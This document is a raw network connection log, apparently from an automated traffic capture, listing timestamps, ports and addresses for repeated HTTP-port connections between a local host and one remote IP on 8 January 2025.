                                                                                        Jan 8, 2025 18:08:50.482526064 CET8050019185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.482537985 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.482616901 CET5001880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.482630968 CET5001980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.482666016 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.482870102 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.482971907 CET8050017185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.484942913 CET5001780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.487653017 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.827677965 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:50.832571030 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.832585096 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:50.832595110 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.011553049 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.016524076 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.016599894 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.016807079 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.021629095 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.157427073 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.218030930 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.287451982 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.421257019 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.515413046 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.520509005 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520523071 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520530939 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520539999 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520623922 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.520657063 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520668030 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520708084 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.520754099 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520762920 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520771980 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520780087 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.520819902 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.525686979 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525811911 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525821924 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525829077 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525837898 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525846958 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525897980 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.525935888 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.525945902 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525957108 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.525993109 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.526007891 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.526093006 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.526144981 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.526195049 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.526205063 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.526277065 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.526366949 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.526438951 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.530792952 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.530806065 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.530863047 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.530904055 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.530914068 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.530946970 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.530955076 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:51.530956030 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531064034 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531073093 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531132936 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531142950 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531183004 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531258106 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531267881 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531317949 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531332016 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531389952 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531408072 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531516075 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531526089 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531589985 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531599045 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531629086 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531636953 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531693935 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531702995 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531747103 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531764984 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.531819105 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538314104 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538324118 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538331985 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538340092 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538348913 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538357973 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538373947 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538383007 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538389921 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.538399935 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.706403017 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:51.780636072 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.443547964 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.443780899 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.448326111 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.448709011 CET8050020185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.448790073 CET5002080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.448811054 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.448947906 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.453851938 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.537020922 CET8050021185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.586250067 CET5002180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.796385050 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:52.801294088 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.801304102 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:52.801311970 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.164057016 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.280539989 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.300460100 CET8050022185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:08:53.468091965 CET5002280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:08:53.684676886 CET5002180192.168.2.4185.177.239.66
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 18:08:53.684752941 CET | 50022 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:53.685240030 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:53.689985037 CET | 80 | 50021 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:53.690033913 CET | 50021 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:53.690057039 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:53.690121889 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:53.690248966 CET | 80 | 50022 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:53.690299034 CET | 50022 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:53.690413952 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:53.695205927 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:54.416863918 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:54.612365961 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:54.803852081 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:54.808742046 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:54.808753967 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:54.808762074 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.180402994 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.185705900 CET | 80 | 50024 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.185765982 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.185939074 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.190701008 CET | 80 | 50024 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.530749083 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.535712004 CET | 80 | 50024 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.535808086 CET | 80 | 50024 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.588704109 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.718029976 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.794926882 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.795243979 CET | 50025 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.799983978 CET | 80 | 50023 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.800039053 CET | 50023 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.800050974 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.800111055 CET | 50025 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.800228119 CET | 50025 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.804977894 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.856637955 CET | 80 | 50024 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:55.932945967 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:55.990760088 CET | 80 | 50024 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.077438116 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.162477016 CET | 50025 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.167340040 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.167352915 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.167361021 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.483486891 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.614466906 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.614969969 CET | 50025 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.890724897 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.890908003 CET | 50025 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.891566992 CET | 50026 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.895783901 CET | 80 | 50024 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.895843983 CET | 50024 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.896166086 CET | 80 | 50025 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.896294117 CET | 50025 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.896353006 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:56.896440983 CET | 50026 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.896548986 CET | 50026 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:56.902703047 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.260790110 CET | 50026 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:57.265729904 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.265743971 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.265752077 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.600389004 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.718080044 CET | 50026 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:57.738435984 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.883446932 CET | 50026 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:57.883768082 CET | 50027 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:57.888427019 CET | 80 | 50026 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.888516903 CET | 50026 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:57.888600111 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:57.888716936 CET | 50027 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:57.888900042 CET | 50027 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:57.893687010 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:58.253427982 CET | 50027 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:58.258326054 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:58.258341074 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:58.258351088 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:58.572508097 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:58.710448027 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:58.710639000 CET | 50027 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:59.769787073 CET | 50027 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:59.770402908 CET | 50028 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:59.775002956 CET | 80 | 50027 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:59.775063038 CET | 50027 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:59.775154114 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:08:59.775226116 CET | 50028 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:59.775526047 CET | 50028 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:08:59.780314922 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.163105965 CET | 50028 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:00.167996883 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.168013096 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.168024063 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.448724985 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.591456890 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.591979980 CET | 50028 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:00.779875040 CET | 50028 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:00.780177116 CET | 50029 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:00.784868002 CET | 80 | 50028 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.784934044 CET | 50028 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:00.784941912 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:00.785003901 CET | 50029 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:00.785177946 CET | 50029 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:00.789935112 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.012046099 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:01.016834974 CET | 80 | 50030 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.016930103 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:01.017096043 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:01.021843910 CET | 80 | 50030 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.166233063 CET | 50029 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:01.171123981 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.171137094 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.171145916 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.374419928 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:01.379241943 CET | 80 | 50030 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.379362106 CET | 80 | 50030 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.472929955 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.611773014 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.616985083 CET | 50029 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:01.709126949 CET | 80 | 50030 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.780531883 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:01.846863985 CET | 80 | 50030 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:01.983700037 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.673832893 CET | 50029 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.679169893 CET | 80 | 50029 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:02.679231882 CET | 50029 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.682526112 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.687408924 CET | 80 | 50030 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:02.687455893 CET | 50030 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.689893961 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.694669008 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:02.694753885 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.700252056 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:02.705060959 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:03.049895048 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:03.054789066 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:03.054805040 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:03.054816961 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:03.358908892 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:03.436759949 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:03.490603924 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:03.608680010 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:04.675870895 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:04.676331997 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:04.680912018 CET | 80 | 50031 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:04.680965900 CET | 50031 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:04.681130886 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:04.681200981 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:04.681320906 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:04.686075926 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.035536051 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.040407896 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.040421009 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.040431023 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.373123884 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.421149969 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.506798983 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.608696938 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.654254913 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.654493093 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.659354925 CET | 80 | 50032 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.659368992 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:05.659425974 CET | 50032 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.659457922 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.682055950 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:05.686855078 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.030735016 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.035624981 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.035640001 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.035650969 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.344084024 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.431709051 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.684874058 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.703893900 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.704011917 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.842772007 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.843384981 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.847798109 CET | 80 | 50033 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.848000050 CET | 50033 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.848196983 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:06.848269939 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.848376989 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:06.853092909 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.202800989 CET | 50034 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.220439911 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.237667084 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.237771988 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.238282919 CET | 80 | 50034 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.238295078 CET | 80 | 50035 | 185.177.239.66 | 192.168.2.4
Jan 8, 2025 18:09:07.238383055 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
Jan 8, 2025 18:09:07.238653898 CET | 50035 | 80 | 192.168.2.4 | 185.177.239.66
